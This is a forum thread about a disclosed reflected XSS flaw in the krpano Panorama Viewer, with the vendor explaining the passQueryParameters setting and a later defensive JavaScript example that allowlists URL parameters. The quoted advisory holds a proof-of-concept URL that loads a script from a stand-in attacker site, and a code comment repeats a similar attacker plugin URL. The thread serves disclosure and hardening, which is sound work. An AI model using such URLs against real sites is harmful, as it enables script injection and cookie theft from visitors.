XSS in krpano Panorama Viewer

  • Hi there,

    I'm dealing with several large corporate clients who are rather obsessive about security and penetration testing. They are apprehensive about creating tours because of potential threats and vulnerabilities which could be created by adding a tour to their server and website.

    I came across this https://seclists.org/fulldisclosure/2020/Oct/7 which details an exploit titled: XSS in krpano Panorama Viewer
    Can anyone provide any more information about this and how I might deal with this if it comes up when dealing with Krpano security issues? I need to have an educated response if I am asked about it so I would really appreciate some info.
    Thank you,

    Details below:

    *XSS in krpano Panorama Viewer*
    CVSS Severity: *Medium*
    CVSS Score: *6.1*
    CVSS Vector:
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    <https://www.first.org/cvss/calculato…S:C/C:L/I:L/A:N>

    *Description*
    krpano Panorama Viewer <=1.20.8 is vulnerable to a Reflected Cross-Site
    Scripting (XSS) vulnerability caused by improper validation of user
    supplied input when loading remote js and XML files in the default
    installation (krpano.html).

    *Impact*
    A remote attacker could exploit this vulnerability using a specially
    crafted URL to execute a script in a victim's Web browser within the
    security context of the hosting Web site, once the URL is clicked or
    visited. An attacker could use this vulnerability to steal the victim's
    cookie-based authentication credentials, force malware execution, user
    redirection and others.

    *Steps to Reproduce*
    Exploit example, from documentation tutorials:
    http://VICTIM_SITE/krpano.html?html5=only&preview.type=grid()&plugin[test].url=https://ATTACKER_SITE/labs/krpano/krpano.js&plugin[test].align=center&plugin[test].onclick=dosomething(hello,plugin)&onstart=showlog();

    *Fix*
    Block remote load of js and XML files. Contact the vendor.

  • First, the *Steps to Reproduce* exploit example is messed up and not correct.

    You could inject a JS plugin by URL if passQueryParameters is true (the default is false):
    https://krpano.com/docu/html/#passQueryParameters

    But this working cross-domain is unlikely...
    Even if so, this should be configurable using security / CORS:
    https://krpano.com/docu/xml/#security

    My guess is this is a bogus alert.

  • Hi,

    this is known and is about the 'passQueryParameters' setting:
    https://krpano.com/docu/html/#passQueryParameters

    When it is enabled, any kind of code can be passed to the viewer; that is what it is made for.
    When disabled, nothing can be injected of course.

    But to improve that feature and to make it safer, in the next release (version 1.21) the passQueryParameters setting will also allow setting a 'whitelist' of variables that can be passed.

    E.g. this way:

    Code
    embedpano({..., passQueryParameters:"startscene,startlookat"});

    Then only the 'startscene' and 'startlookat' parameters can be passed and all others will be ignored.

    When XSS is an actual problem in your usage case, make sure that passQueryParameters is set to false.
    And if you need to pass parameters via the URL, then this would need to be done manually (use JS code to parse the query string and pass the custom parameters via the krpano JS API; I can make an example if required).

    Best regards,
    Klaus
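One way to do the manual parsing Klaus describes, as an added example that is neither krpano's own code nor from anyone in this thread: keep passQueryParameters off, parse window.location.search yourself, keep only an allowlist of parameters whose values match a strict pattern, and hand those to the viewer through the embedpano "vars" option. embedpano(), "vars" and "passQueryParameters" are documented krpano settings; the file name "tour.xml", the div id "pano", the validators, and the function names filterQueryParameters / embedWithSafeParams are assumptions made for this example, as is the assumption that the tour's startup action reads startscene and startlookat.

```javascript
// Added example (not krpano's own code and not from the thread): handle URL
// parameters by hand with passQueryParameters disabled, instead of letting
// the viewer accept every query parameter as a variable.
//
// Hypothetical assumptions: krpano.js is already loaded (so embedpano exists
// in the browser), the tour XML is "tour.xml", the viewer div has id "pano",
// and the tour's startup action consumes the variables startscene and
// startlookat. embedpano(), its "vars" and "passQueryParameters" options are
// documented krpano settings; everything else here is named for this example.

// Allowlist: parameter name -> validator for its value. Anything not listed,
// or listed but failing validation, is dropped before it reaches the viewer.
const ALLOWED_PARAMS = {
  // a scene name: letters, digits, "_" and "-" only, so no "(", ")" or ";"
  startscene: (v) => /^[A-Za-z0-9_-]{1,64}$/.test(v),
  // "h,v,fov" as three plain numbers
  startlookat: (v) => /^-?\d+(\.\d+)?,-?\d+(\.\d+)?,\d+(\.\d+)?$/.test(v),
};

// Parse a query string (window.location.search) and keep only allowlisted,
// well-formed parameters. Returns the kept values and the rejected names.
function filterQueryParameters(search, allowed = ALLOWED_PARAMS) {
  const safe = {};
  const rejected = [];
  for (const [name, value] of new URLSearchParams(search)) {
    const ok =
      Object.prototype.hasOwnProperty.call(allowed, name) && allowed[name](value);
    if (ok) {
      safe[name] = value;
    } else {
      rejected.push(name); // e.g. plugin[test].url, onstart, preview.type
    }
  }
  return { safe, rejected };
}

// Weak form, for contrast (do not use on a site that serves untrusted URLs):
//   embedpano({ xml: "tour.xml", target: "pano", passQueryParameters: true });
// lets ?plugin[x].url=https://attacker/plugin.js&onstart=... become viewer
// variables. The hardened form below keeps passQueryParameters off and hands
// over only the filtered values through the "vars" option.
function embedWithSafeParams(search, embed, extra = {}) {
  const { safe, rejected } = filterQueryParameters(search);
  embed({
    xml: "tour.xml",
    target: "pano",
    html5: "only",
    passQueryParameters: false, // nothing from the URL reaches the viewer directly
    vars: safe,                 // set before the XML loads, e.g. startscene
    ...extra,
  });
  return { safe, rejected };
}

// In a browser with krpano.js loaded this wires the real viewer up; in Node
// (no window/embedpano) it is skipped so the functions can be exercised alone.
if (typeof window !== "undefined" && typeof embedpano === "function") {
  embedWithSafeParams(window.location.search, embedpano);
}
```

Run against the advisory's query string, the plugin[test].url, plugin[test].onclick and onstart parameters are all rejected and only startscene and startlookat survive; a value such as startscene=scene_1;showlog() is dropped as well because it fails the validator, so a parameter name being allowed is not enough on its own.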
